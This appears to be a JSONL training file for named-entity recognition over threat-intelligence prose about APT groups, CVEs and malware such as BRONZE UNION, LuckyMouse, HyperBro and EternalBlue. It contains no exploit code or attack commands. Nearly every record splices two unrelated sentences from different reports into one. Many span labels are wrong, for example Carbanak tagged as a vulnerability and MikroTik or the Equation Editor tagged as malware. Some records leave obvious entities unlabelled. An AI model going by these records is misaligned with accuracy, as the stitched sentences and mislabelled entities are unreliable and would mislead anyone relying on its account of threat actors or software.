{"text": "This newly observed activity uses a series of redirections and fileless , malicious implementations of legitimate tools to gain access to the targeted systems . In 2015 , the SecureWorks\u00ae Counter Threat Unit\u2122 ( CTU ) research team documented the BRONZE UNION threat group ( formerly labeled TG-3390 ) , which CTU\u2122 analysis suggests is based in the People's Republic of China ( PRC ) .", "spans": [{"start": 175, "end": 208, "label": "Organization"}, {"start": 211, "end": 214, "label": "Organization"}, {"start": 291, "end": 298, "label": "Organization"}, {"start": 309, "end": 313, "label": "Organization"}, {"start": 348, "end": 374, "label": "Organization"}, {"start": 377, "end": 380, "label": "Organization"}]}
{"text": "The goal of the attackers appears to be to collect intellectual property such as design documents , formulas , and manufacturing processes . After reestablishing access , the adversaries download tools such as gsecudmp and WCE that are staged temporarily on websites that TG-3390 previously compromised but never used .", "spans": [{"start": 210, "end": 218, "label": "Malware"}, {"start": 223, "end": 226, "label": "Malware"}, {"start": 272, "end": 279, "label": "Organization"}]}
{"text": "The purpose of the attacks appears to be industrial espionage , collecting intellectual property for competitive advantage . In 2015 , the SecureWorks documented the BRONZE UNION threat group ( formerly labeled TG-3390 ) , which CTU analysis suggests is based in the People's Republic of China ( PRC ) .", "spans": [{"start": 139, "end": 150, "label": "Organization"}, {"start": 166, "end": 178, "label": "Organization"}, {"start": 211, "end": 218, "label": "Organization"}, {"start": 229, "end": 232, "label": "Organization"}, {"start": 267, "end": 284, "label": "Organization"}]}
{"text": "This particular threat was also used by hackers to compromise a Korean social network site to steal records of 35 million users . BRONZE UNION threat campaigns that illustrate the evolution of the group 's methods and espionage objectives .", "spans": []}
{"text": "These attacks are primarily targeting private industry in search of key intellectual property for competitive advantage , military institutions , and governmental organizations often in search of documents related to current political events and human rights organizations . Based on BRONZE UNION 's targeting activity , CTU researchers assess it is highly likely that the group focuses on political and defense organization networks .", "spans": [{"start": 38, "end": 54, "label": "Organization"}, {"start": 122, "end": 143, "label": "Organization"}, {"start": 150, "end": 176, "label": "Organization"}, {"start": 225, "end": 234, "label": "Organization"}, {"start": 246, "end": 272, "label": "Organization"}, {"start": 321, "end": 324, "label": "Organization"}, {"start": 390, "end": 399, "label": "Organization"}, {"start": 404, "end": 424, "label": "Organization"}]}
{"text": "Nitro 's campaign focused on the chemical sector with the goal of obtaining sensitive documents such as proprietary designs , formulas , and manufacturing processes . this SWC was used to specifically target Turkish .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 33, "end": 48, "label": "Organization"}]}
{"text": "This attack campaign focused on the chemical sector with the goal of obtaining sensitive documents such as proprietary designs , formulas , and manufacturing processes . In 2016 , the threat actors conducted a strategic web compromise ( SWC ) on the website of an international industry organization that affected aerospace , academic , media , technology , government , and utilities organizations around the world .", "spans": [{"start": 36, "end": 51, "label": "Organization"}, {"start": 264, "end": 299, "label": "Organization"}, {"start": 314, "end": 323, "label": "Organization"}, {"start": 326, "end": 334, "label": "Organization"}, {"start": 337, "end": 342, "label": "Organization"}, {"start": 345, "end": 355, "label": "Organization"}, {"start": 358, "end": 368, "label": "Organization"}, {"start": 375, "end": 398, "label": "Organization"}]}
{"text": "Examples of notable Potao dissemination techniques , some of which were previously unseen , or at least relatively uncommon , include the use of highly-targeted spear-phishing SMS messages to drive potential victims to malware download sites and USB worm functionality that tricked the user into ' willingly ' executing the trojan . In addition , BRONZE UNION activity on multiple U.S.-based defense manufacturer networks included the threat actors seeking information associated with aerospace technologies , combat processes , and naval defense systems .", "spans": [{"start": 20, "end": 25, "label": "System"}, {"start": 381, "end": 399, "label": "Organization"}, {"start": 485, "end": 507, "label": "Organization"}, {"start": 510, "end": 526, "label": "Organization"}, {"start": 533, "end": 554, "label": "Organization"}]}
{"text": "The PassCV group continues to be one of the most successful and active threat groups that leverage a wide array of stolen Authenticode-signing certificates . this SWC was used to specifically target Turkish goverment .", "spans": [{"start": 4, "end": 16, "label": "Organization"}]}
{"text": "The PassCV group continues to be extremely effective in compromising both small and large game companies and surreptitiously using their code-signing certificates to infect an even larger swath of organizations . Since that analysis , CTU researchers have observed multiple BRONZE UNION threat campaigns that illustrate the evolution of the group 's methods and espionage objectives .", "spans": [{"start": 4, "end": 10, "label": "Organization"}, {"start": 90, "end": 104, "label": "Organization"}, {"start": 235, "end": 238, "label": "Organization"}]}
{"text": "The ScarCruft group keeps expanding its exfiltration targets to steal further information from infected hosts and continues to create tools for additional data exfiltration . this SWC was used to specifically target Turkish banking .", "spans": [{"start": 4, "end": 13, "label": "Organization"}, {"start": 224, "end": 231, "label": "Organization"}]}
{"text": "Financially motivated APT groups which focus efforts on targeted attacks on the financial sector such as \u2014 Anunak , Corkow , Buhtrap \u2014 usually managed botnets using developed or modified banking Trojans . this SWC was used to specifically target Turkish academic networks .", "spans": [{"start": 80, "end": 96, "label": "Organization"}, {"start": 116, "end": 122, "label": "System"}, {"start": 187, "end": 194, "label": "Organization"}]}
{"text": "They are selective in their attacks and wait for about three months between incidents , which is approximately three times longer than other financially motivated APT groups , like MoneyTaker , Anunak ( Carbanak ) , Buhtrap or Cobalt . BRONZE UNION has consistently demonstrated the capability to conduct successful large-scale intrusions against high-profile networks and systems .", "spans": []}
{"text": "The company specializes in finance and natural resources specific to that region . The threat actors appear to be able to create and leverage multiple SWCs in parallel .", "spans": [{"start": 27, "end": 34, "label": "Organization"}, {"start": 151, "end": 155, "label": "Malware"}]}
{"text": "Based on the profile of the victims and the type of information targeted by the attackers , Symantec believes that Butterfly is financially motivated , stealing information it can potentially profit from . In a separate incident , CTU researchers identified a file named s.txt , which is consistent with the output of the Netview host-enumeration tool .", "spans": [{"start": 92, "end": 100, "label": "Organization"}, {"start": 231, "end": 234, "label": "Organization"}, {"start": 271, "end": 276, "label": "Indicator"}]}
{"text": "Fxmsp specialize in breaching highly secure protected networks to access private corporate and government information . BRONZE UNION actors leveraged initial web shell access on Internet-facing systems to conduct internal reconnaissance .", "spans": [{"start": 0, "end": 5, "label": "Organization"}]}
{"text": "But , thanks to the attackers known affection for decoy documents that pose as news summaries , we were able to date the campaign back to March 2018 . BRONZE UNION appears to use a combination of self-registered IP addresses and commercial VPN services in its command and control ( C2 ) and operational infrastructure .", "spans": [{"start": 20, "end": 29, "label": "Organization"}, {"start": 212, "end": 214, "label": "Indicator"}, {"start": 240, "end": 243, "label": "System"}, {"start": 282, "end": 284, "label": "System"}]}
{"text": "Donot attacked government agencies , aiming for classified intelligence . This script relays commands and output between the controller and the system .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 15, "end": 34, "label": "Organization"}]}
{"text": "Lazarus is a very active attack group involved in both cyber crime and espionage . The threat actors used the appcmd command-line tool to unlock and disable the default logging component on the server ( systsm.webServer/httplogging ) and then delete existing logs from the system ( see Figure 4 ) .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 203, "end": 231, "label": "System"}]}
{"text": "To make the fraudulent withdrawals , Lazarus first breaches targeted banks' networks and compromises the switch application servers handling ATM transactions . In 2016 , CTU researchers observed the group using native system .", "spans": [{"start": 37, "end": 44, "label": "Organization"}, {"start": 69, "end": 75, "label": "Organization"}, {"start": 170, "end": 173, "label": "Organization"}]}
{"text": "The operation , known as FASTCash\u201d has enabled Lazarus to fraudulently empty ATMs of cash . In March 2018 we detected an ongoing campaign .", "spans": [{"start": 47, "end": 54, "label": "Organization"}]}
{"text": "This malware in turn intercepts fraudulent Lazarus cash withdrawal requests and sends fake approval responses , allowing the attackers to steal cash from ATMs . TG-3390 's activities indicate a preference for leveraging SWCs and scan-and-exploit techniques to compromise target systems .", "spans": [{"start": 5, "end": 12, "label": "System"}, {"start": 43, "end": 50, "label": "Organization"}]}
{"text": "The threat actors behind the Sea Turtle campaign were successful in compromising entities by manipulating and falsifying DNS records at various levels in the domain name space . As of this publication , BRONZE UNION remains a formidable threat group that targets intellectual property and executes its operations at a swift pace .", "spans": [{"start": 4, "end": 17, "label": "Organization"}, {"start": 110, "end": 124, "label": "Malware"}]}
{"text": "If an attacker was able to compromise an organization's network administrator credentials , the attacker would be able to change that particular organization's DNS records at will . we detected an ongoing campaign targeting a national data center .", "spans": [{"start": 6, "end": 14, "label": "Organization"}]}
{"text": "If the attackers were able to obtain one of these EPP keys , they would be able to modify any DNS records that were managed by that particular registrar . The operators used the HyperBro Trojan as their last-stage in-memory remote administration tool ( RAT ) .", "spans": [{"start": 7, "end": 16, "label": "Organization"}, {"start": 178, "end": 193, "label": "Malware"}, {"start": 224, "end": 250, "label": "Malware"}, {"start": 253, "end": 256, "label": "Malware"}]}
{"text": "Captured legitimate user credentials when users interacted with these actor - controlled servers . we detected an ongoing campaign targeting a national data center in the Centeral Asia .", "spans": [{"start": 70, "end": 75, "label": "Organization"}]}
{"text": "During a typical incident , the actor would modify the NS records for the targeted organization , pointing users to a malicious DNS server that provided actor-controlled responses to all DNS queries . The tools found in this campaign , such as the HyperBro Trojan , are regularly used by a variety of Chinese-speaking actors .", "spans": [{"start": 32, "end": 37, "label": "Organization"}, {"start": 248, "end": 263, "label": "Malware"}]}
{"text": "The next step for the actor was to build MitM servers that impersonated legitimate services to capture user credentials . Due to tools and tactics in use we attribute the campaign to LuckyMouse Chinese-speaking actor ( also known as EmissaryPanda and APT27 ) .", "spans": [{"start": 22, "end": 27, "label": "Organization"}, {"start": 41, "end": 53, "label": "System"}, {"start": 183, "end": 193, "label": "Organization"}, {"start": 233, "end": 246, "label": "Organization"}, {"start": 251, "end": 256, "label": "Organization"}]}
{"text": "This redirection allowed the attackers to harvest credentials of administrators who manage domains with the TLD of Saudi Arabia (.sa) . It's possible TG-3390 used a waterhole to infect data center employees .", "spans": [{"start": 29, "end": 38, "label": "Organization"}, {"start": 150, "end": 157, "label": "Organization"}, {"start": 185, "end": 206, "label": "Organization"}]}
{"text": "Obtaining access to this ccTLD registrars would have allowed attackers to hijack any domain that used those ccTLDs . Even when we observed LuckyMouse using weaponized documents with CVE-2017-11882 ( Microsoft Office Equation Editor , widely used by Chinese-speaking actors since December 2017 ) , we can\u2032t prove they were related to this particular attack .", "spans": [{"start": 61, "end": 70, "label": "Organization"}, {"start": 182, "end": 196, "label": "Vulnerability"}, {"start": 199, "end": 231, "label": "Malware"}]}
{"text": "Once they have access to the network , they steal the organization's legitimate SSL certificate and use it on actor-controlled servers . We suspect this router was hacked as part of the campaign in order to process the malware 's HTTP requests .", "spans": [{"start": 39, "end": 43, "label": "Organization"}, {"start": 110, "end": 126, "label": "System"}, {"start": 127, "end": 134, "label": "System"}, {"start": 153, "end": 159, "label": "Malware"}, {"start": 230, "end": 234, "label": "Indicator"}]}
{"text": "The document exploited CVE-2012-0158 and will decode and write an executable to disk upon infection . In March 2017 , Wikileaks published details about an exploit affecting Mikrotik called ChimayRed .", "spans": [{"start": 23, "end": 36, "label": "Vulnerability"}, {"start": 118, "end": 127, "label": "Organization"}, {"start": 155, "end": 162, "label": "Vulnerability"}, {"start": 173, "end": 181, "label": "Malware"}, {"start": 189, "end": 198, "label": "Malware"}]}
{"text": "iSiGHT Partners has tracked Sandworm Team for some time - and we publicly reported on some of their activities in October 2014 , when we discovered their use of a zero-day exploit , CVE-2014-4114 . There were traces of HyperBro in the infected data center from mid-November 2017 .", "spans": [{"start": 0, "end": 15, "label": "Organization"}, {"start": 28, "end": 41, "label": "Organization"}, {"start": 163, "end": 179, "label": "Vulnerability"}, {"start": 182, "end": 195, "label": "Vulnerability"}, {"start": 219, "end": 227, "label": "Malware"}]}
{"text": "In July of 2015 , we identified a full e-mail uploaded to an antivirus scanning service that carried a Scarlet Mimic exploit document . In March 2017 , Wikileaks published details about an exploit affecting Mikrotik called ChimayRed .", "spans": [{"start": 103, "end": 124, "label": "Vulnerability"}, {"start": 152, "end": 161, "label": "Organization"}, {"start": 189, "end": 196, "label": "Vulnerability"}, {"start": 207, "end": 215, "label": "Malware"}, {"start": 223, "end": 232, "label": "Malware"}]}
{"text": "The group uses legitimate administration tools to fly under the radar in their post-exploitation phase , which makes detection of malicious activity , as well as attribution more complicated . This is a hacking group with Chinese origins which targets selected organisations related with education , energy and technology .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 15, "end": 46, "label": "System"}, {"start": 288, "end": 297, "label": "Organization"}, {"start": 300, "end": 306, "label": "Organization"}, {"start": 311, "end": 321, "label": "Organization"}]}
{"text": "Through the exploitation of the HTA handler vulnerability described in CVE-2017-1099 , the observed RTF attachments download . Usually , the delivered payload is either the well-known ' PlugX ' or ' HTTPBrowser ' RAT , a tool which is believed to have Chinese origins and to be used only by certain Chinese hacking groups .", "spans": [{"start": 71, "end": 84, "label": "Vulnerability"}, {"start": 100, "end": 115, "label": "Malware"}, {"start": 186, "end": 191, "label": "Malware"}, {"start": 199, "end": 210, "label": "Malware"}, {"start": 213, "end": 216, "label": "Malware"}]}
{"text": "In early May , the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE-2017-0199 . Emissary Panda has used many ACTs with the most notable being the exploits from the Hacking Team leak .", "spans": [{"start": 44, "end": 59, "label": "Malware"}, {"start": 124, "end": 137, "label": "Vulnerability"}]}
{"text": "As early as March 4 , 2017 , malicious documents exploiting CVE-2017-0199 were used to deliver the LATENTBOT malware . Emissary Panda is still active and continues to target selected organisations .", "spans": [{"start": 29, "end": 48, "label": "Malware"}, {"start": 60, "end": 73, "label": "Vulnerability"}, {"start": 99, "end": 116, "label": "System"}]}
{"text": "FireEye believes that two actors \u2013 Turla and an unknown financially motivated actor \u2013 were using the first EPS zero-day CVE-2017-0261 , and APT28 was using the second EPS zero-day CVE-2017-0262 along with a new Escalation of Privilege (EOP) zero-day CVE-2017-0263 . Cybersecurity researchers have uncovered an espionage campaign that has targeted a national data center of an unnamed central Asian country in order to conduct watering hole attacks .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 26, "end": 32, "label": "Organization"}, {"start": 56, "end": 67, "label": "Organization"}, {"start": 120, "end": 133, "label": "Vulnerability"}, {"start": 140, "end": 145, "label": "Organization"}, {"start": 180, "end": 193, "label": "Vulnerability"}, {"start": 250, "end": 263, "label": "Vulnerability"}, {"start": 266, "end": 279, "label": "Organization"}]}
{"text": "The first , st07383.en17.docx , continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME . The campaign is believed to be active covertly since fall 2017 .", "spans": [{"start": 12, "end": 29, "label": "Malware"}, {"start": 80, "end": 93, "label": "Vulnerability"}, {"start": 199, "end": 206, "label": "Malware"}]}
{"text": "This vulnerability was found in a document named Trump's_Attack_on_Syria_English.docx\u201d . LuckyMouse , also known as Iron Tiger , EmissaryPanda , APT 27 and Threat Group-3390 , is the same group of Chinese hackers who was found targeting Asian countries with Bitcoin mining malware early this year .", "spans": [{"start": 34, "end": 42, "label": "Malware"}, {"start": 49, "end": 86, "label": "Vulnerability"}, {"start": 89, "end": 99, "label": "Organization"}, {"start": 116, "end": 126, "label": "Organization"}, {"start": 129, "end": 142, "label": "Organization"}, {"start": 145, "end": 151, "label": "Organization"}, {"start": 156, "end": 173, "label": "Organization"}, {"start": 258, "end": 280, "label": "Malware"}]}
{"text": "It is possible that CVE-2017-8759 was being used by additional actors . March by security researchers from Kaspersky Labs .", "spans": [{"start": 20, "end": 33, "label": "Vulnerability"}, {"start": 63, "end": 69, "label": "Organization"}, {"start": 107, "end": 121, "label": "Organization"}]}
{"text": "The addition of the EternalBlue exploit to Metasploit has made it easy for threat actors to exploit these vulnerabilities . For example , at the end of 2016 CTU researchers observed the threat actors using native system functionality to disable logging processes and delete logs within a network .", "spans": [{"start": 20, "end": 31, "label": "Vulnerability"}, {"start": 43, "end": 53, "label": "System"}, {"start": 82, "end": 88, "label": "Organization"}, {"start": 157, "end": 160, "label": "Organization"}]}
{"text": "The Magnitude EK landing page consisted of CVE-2016-0189 , which was first reported by FireEye as being used in Neutrino Exploit Kit after it was patched . The group has been active since at least 2010 and was behind many previous attack campaigns resulting in the theft of massive amounts of data from the directors and managers of US-based defense contractors .", "spans": [{"start": 4, "end": 16, "label": "System"}, {"start": 43, "end": 56, "label": "Vulnerability"}, {"start": 87, "end": 94, "label": "Organization"}, {"start": 112, "end": 132, "label": "System"}, {"start": 342, "end": 361, "label": "Organization"}]}
{"text": "The malware leverages an exploit , codenamed EternalBlue\u201d , that was released by the Shadow Brokers on April 14 , 2017 . attacks to a Chinese-speaking threat actor group called LuckyMouse .", "spans": [{"start": 45, "end": 57, "label": "Vulnerability"}, {"start": 85, "end": 99, "label": "Organization"}]}
{"text": "Some hackers even went onto use the Cisco exploits in the wild . LuckyMouse has been spotted using a widely used Microsoft Office vulnerability ( CVE-2017-11882 ) .", "spans": [{"start": 36, "end": 50, "label": "Vulnerability"}, {"start": 113, "end": 129, "label": "System"}, {"start": 146, "end": 160, "label": "Vulnerability"}]}
{"text": "DanderSpritz is the framework for controlling infected machines , different from FuZZbuNch as the latter provides a limited toolkit for the post-exploitation stage with specific functions such as DisableSecurity and EnableSecurity for DarkPulsar . This time the group chose a national data center as its target from an unnamed country in Central Asia in an attempt to gain \" access to a wide range of government resources at one fell swoop \" .", "spans": [{"start": 0, "end": 12, "label": "System"}, {"start": 81, "end": 90, "label": "System"}, {"start": 196, "end": 211, "label": "System"}, {"start": 216, "end": 230, "label": "System"}, {"start": 235, "end": 245, "label": "System"}]}
{"text": "In their latest leak , they have released the UNITEDRAKE NSA exploit , which is a remote access and control tool that can remotely target Windows-based systems to capture desired information and transfer it to a server . The initial attack vector used in the attack against the data center is unclear , but researchers believe LuckyMouse possibly had conducted watering hole or phishing attacks to compromise accounts belonging to employees at the national data center .", "spans": [{"start": 46, "end": 68, "label": "Vulnerability"}, {"start": 163, "end": 190, "label": "Malware"}, {"start": 195, "end": 203, "label": "Malware"}, {"start": 327, "end": 337, "label": "Organization"}, {"start": 431, "end": 440, "label": "Organization"}]}
{"text": "On the other hand , ShadowBrokers group made headlines in 2016 when it claimed to have robbed various exploitation tools used by the NSA including the notorious ETERNALBLUE that was a vital component in the WannaCry ransomware campaign causing damages to systems worldwide . According to the researchers , the group injected malicious JavaScript code into the official government websites associated with the data center in order to conduct watering hole attacks .", "spans": [{"start": 133, "end": 136, "label": "Organization"}, {"start": 161, "end": 172, "label": "Vulnerability"}, {"start": 335, "end": 350, "label": "Malware"}]}
{"text": "In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload . the targeted system with a piece of malware called HyperBro , a Remote Access Trojan ( RAT ) .", "spans": [{"start": 90, "end": 123, "label": "Malware"}, {"start": 143, "end": 156, "label": "Vulnerability"}, {"start": 252, "end": 260, "label": "Malware"}, {"start": 265, "end": 285, "label": "Malware"}, {"start": 288, "end": 291, "label": "Malware"}]}
{"text": "Despite being an older vulnerability , many threat actors continue to leverage CVE-2012-0158 to exploit Microsoft Word . The main command and control ( C&C ) server used in this attack is hosted on an IP address which belongs to a Ukrainian ISP , specifically to a MikroTik router running a firmware version released in March 2016 .", "spans": [{"start": 79, "end": 92, "label": "Vulnerability"}, {"start": 104, "end": 118, "label": "Malware"}, {"start": 152, "end": 155, "label": "System"}, {"start": 201, "end": 203, "label": "Indicator"}, {"start": 265, "end": 273, "label": "Malware"}]}
{"text": "According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability . the targets of the hacking group were in the automotive .", "spans": [{"start": 17, "end": 30, "label": "Organization"}, {"start": 153, "end": 179, "label": "Vulnerability"}, {"start": 227, "end": 237, "label": "Organization"}]}
{"text": "In order to carry out this operation , it uses publicly available tools , including Mimikatz ( Hacktool.Mimikatz ) and an open-source tool that exploits a known Windows privilege escalation vulnerability ( CVE-2016-0051 ) on unpatched computers . Dell SecureWorks researchers unveiled a report on Threat Group-3390 that has targeted companies around the world while stealing massive amounts of industrial data .", "spans": [{"start": 47, "end": 71, "label": "System"}, {"start": 84, "end": 92, "label": "System"}, {"start": 95, "end": 112, "label": "System"}, {"start": 206, "end": 219, "label": "Vulnerability"}, {"start": 247, "end": 263, "label": "Organization"}, {"start": 304, "end": 314, "label": "Organization"}]}
{"text": "Each of the spear phishing attacks contained links to .doc files , which were really RTF documents that attempt to exploit CVE-2017-8570 ( Composite Moniker ) . The group , believed to be based in China , has also targeted defense contractors , colleges and universities , law firms , and political organizations \u2014 including organizations related to Chinese minority ethnic groups .", "spans": [{"start": 54, "end": 64, "label": "System"}, {"start": 85, "end": 98, "label": "Malware"}, {"start": 123, "end": 136, "label": "Vulnerability"}, {"start": 139, "end": 148, "label": "Vulnerability"}, {"start": 149, "end": 156, "label": "Vulnerability"}, {"start": 223, "end": 242, "label": "Organization"}, {"start": 245, "end": 253, "label": "Organization"}, {"start": 258, "end": 270, "label": "Organization"}, {"start": 273, "end": 282, "label": "Organization"}, {"start": 289, "end": 312, "label": "Organization"}, {"start": 358, "end": 380, "label": "Organization"}]}
{"text": "The Word document usually exploits CVE-2012-0158 . LAS VEGAS\u2014Today at the Black Hat information security conference , Dell SecureWorks researchers unveiled a report on a newly detected hacking group that has targeted companies around the world while stealing massive amounts of industrial data .", "spans": [{"start": 4, "end": 17, "label": "Malware"}, {"start": 35, "end": 48, "label": "Vulnerability"}, {"start": 118, "end": 134, "label": "Organization"}]}
{"text": "Sometimes the attackers send an MS PowerPoint document instead , which exploits CVE-2014-6352 . Designated as Threat Group 3390 and nicknamed \" Emissary Panda \" by researchers , the hacking group has compromised victims' networks largely through \" watering hole \" attacks launched from over 100 compromised legitimate websites , sites picked because they were known to be frequented by those targeted in the attack .", "spans": [{"start": 14, "end": 23, "label": "Organization"}, {"start": 32, "end": 54, "label": "Malware"}, {"start": 80, "end": 93, "label": "Vulnerability"}, {"start": 110, "end": 127, "label": "Organization"}, {"start": 144, "end": 158, "label": "Organization"}]}
{"text": "Sometimes Patchwork send an MS PowerPoint document instead , which exploits CVE-2014-6352 . the United Kingdom had data stolen by members of Emissary Panda .", "spans": [{"start": 10, "end": 19, "label": "Organization"}, {"start": 28, "end": 50, "label": "Malware"}, {"start": 76, "end": 89, "label": "Vulnerability"}, {"start": 141, "end": 155, "label": "Organization"}]}
{"text": "The malicious documents that Unit 42 examined contained legitimate decoy lures as well as malicious embedded EPS files targeting the CVE-2015-2545 and CVE-2017-0261 vulnerabilities . the US had data stolen by members of Emissary Panda .", "spans": [{"start": 29, "end": 36, "label": "Organization"}, {"start": 109, "end": 118, "label": "Malware"}, {"start": 133, "end": 146, "label": "Vulnerability"}, {"start": 151, "end": 164, "label": "Vulnerability"}, {"start": 220, "end": 234, "label": "Organization"}]}
{"text": "One of the favorite methods used by the Pitty Tiger group to infect users is to use a Microsoft Office Word document which exploits a specific vulnerability ( CVE-2012-0158 ) . No zero-day vulnerabilities were used to breach targeted networks , instead \" TG-3390 relied on old vulnerabilities such as CVE-2011-3544 \" \u2014 a near-year-old Java security hole \u2014 \" and CVE-2010-0738 to compromise their targets \" , Dell SecureWorks' researchers reported .", "spans": [{"start": 40, "end": 57, "label": "Organization"}, {"start": 86, "end": 116, "label": "Malware"}, {"start": 159, "end": 172, "label": "Vulnerability"}, {"start": 180, "end": 188, "label": "Vulnerability"}, {"start": 301, "end": 314, "label": "Vulnerability"}, {"start": 362, "end": 375, "label": "Vulnerability"}, {"start": 408, "end": 425, "label": "Organization"}]}
{"text": "The document , when opened , used an embedded ActiveX control to download a JavaScript file from a remote site that used a previously unknown vulnerability in some versions of Windows ( later designated CVE-2013-7331 ) to read information about the browser 's installed components . The group used a number of tools common to other Chinese hacking groups , but they had a few unique tools of their own with interfaces developed for Standard ( Simplified ) Chinese .", "spans": [{"start": 46, "end": 61, "label": "System"}, {"start": 76, "end": 91, "label": "Malware"}, {"start": 203, "end": 216, "label": "Vulnerability"}]}
{"text": "The document files exploit at least three known vulnerabilities in Microsoft Office , which we discuss in the Infection Techniques section . If the address falls within ranges that the attackers are interested in , the malicious site waits for their next page view to drop an exploit on the desirable target 's PC .", "spans": [{"start": 4, "end": 18, "label": "Malware"}, {"start": 48, "end": 63, "label": "Vulnerability"}, {"start": 276, "end": 283, "label": "Vulnerability"}]}
{"text": "In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload . Visitors to sites exploited by Emissary Panda are directed by code embedded in the sites to a malicious webpage , which screens their IP address .", "spans": [{"start": 90, "end": 123, "label": "Malware"}, {"start": 143, "end": 156, "label": "Vulnerability"}, {"start": 335, "end": 337, "label": "Indicator"}]}
{"text": "According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability . There has also been at least one victim targeted by a spear-phishing attack .", "spans": [{"start": 17, "end": 30, "label": "Organization"}, {"start": 153, "end": 179, "label": "Vulnerability"}]}
{"text": "PLATINUM 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . A variety of malware , including the PlugX tool , was shared with other known Chinese threat groups .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 143, "end": 160, "label": "Vulnerability"}, {"start": 239, "end": 249, "label": "Malware"}]}
{"text": "The group 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . Once inside networks , the group generally targeted Windows network domain controllers and Exchange e-mail servers , targeting user credentials to allow them to move to other systems throughout the targeted network .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 144, "end": 161, "label": "Vulnerability"}, {"start": 255, "end": 262, "label": "System"}]}
{"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . They used an exploit of Internet Information Server to inject keylogger and backdoor malware onto the Exchange server .", "spans": [{"start": 20, "end": 28, "label": "Vulnerability"}, {"start": 95, "end": 104, "label": "Organization"}, {"start": 145, "end": 163, "label": "Organization"}, {"start": 212, "end": 219, "label": "Vulnerability"}, {"start": 261, "end": 270, "label": "Malware"}, {"start": 275, "end": 283, "label": "Malware"}, {"start": 284, "end": 291, "label": "Malware"}]}
{"text": "Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp . But two tools used were unique to the group : ASPXTool , an Internet Information Services ( IIS ) specific \" Web shell \" used to gain access to servers inside a target 's network ; and the OwaAuth credential stealing tool and Web shell , used to attack Microsoft Exchange servers running the Web Outlook interface .", "spans": [{"start": 0, "end": 8, "label": "Vulnerability"}, {"start": 176, "end": 183, "label": "System"}, {"start": 232, "end": 240, "label": "Malware"}, {"start": 246, "end": 275, "label": "System"}, {"start": 278, "end": 281, "label": "System"}, {"start": 295, "end": 304, "label": "System"}, {"start": 375, "end": 382, "label": "Organization"}, {"start": 412, "end": 421, "label": "System"}, {"start": 439, "end": 448, "label": "Organization"}, {"start": 482, "end": 489, "label": "System"}]}
{"text": "However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers . By using such features and tools , attackers are hoping to blend in on the victim 's network and hide their activity in a sea of legitimate processes .", "spans": [{"start": 50, "end": 54, "label": "Organization"}, {"start": 88, "end": 96, "label": "Vulnerability"}]}
{"text": "PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 . TAA leverages advanced artificial intelligence and machine learning that combs through Symantec 's data lake of telemetry in order to spot patterns associated with targeted attacks .", "spans": [{"start": 0, "end": 4, "label": "System"}, {"start": 96, "end": 115, "label": "Organization"}, {"start": 118, "end": 137, "label": "Organization"}, {"start": 208, "end": 217, "label": "Organization"}, {"start": 225, "end": 247, "label": "Vulnerability"}, {"start": 266, "end": 270, "label": "System"}, {"start": 281, "end": 284, "label": "Organization"}, {"start": 368, "end": 376, "label": "Organization"}]}
{"text": "Each of the spear phishing attacks contained links to .doc files , which were really RTF documents that attempt to exploit CVE-2017-8570 ( Composite Moniker ) . January 2018 , TAA triggered an alert at a large telecoms operator in Southeast Asia .", "spans": [{"start": 54, "end": 64, "label": "System"}, {"start": 85, "end": 98, "label": "Malware"}, {"start": 123, "end": 136, "label": "Vulnerability"}, {"start": 139, "end": 148, "label": "Vulnerability"}, {"start": 149, "end": 156, "label": "Vulnerability"}, {"start": 176, "end": 179, "label": "Organization"}, {"start": 210, "end": 227, "label": "Organization"}]}
{"text": "The Word document usually exploits CVE-2012-0158 . Thrip was using PsExec to move laterally between computers on the company 's network .", "spans": [{"start": 4, "end": 17, "label": "Malware"}, {"start": 35, "end": 48, "label": "Vulnerability"}, {"start": 67, "end": 73, "label": "Malware"}]}
{"text": "Sometimes the attackers send an MS PowerPoint document instead , which exploits CVE-2014-6352 . TAA triggered an alert at a large telecoms operator in Southeast Asia .", "spans": [{"start": 14, "end": 23, "label": "Organization"}, {"start": 32, "end": 54, "label": "Malware"}, {"start": 80, "end": 93, "label": "Vulnerability"}, {"start": 96, "end": 99, "label": "Organization"}, {"start": 130, "end": 147, "label": "Organization"}]}
{"text": "Sometimes Patchwork send an MS PowerPoint document instead , which exploits CVE-2014-6352 . AA triggered an alert at a large telecoms operator in Southeast Asia .", "spans": [{"start": 10, "end": 19, "label": "Organization"}, {"start": 28, "end": 50, "label": "Malware"}, {"start": 76, "end": 89, "label": "Vulnerability"}, {"start": 125, "end": 142, "label": "Organization"}]}
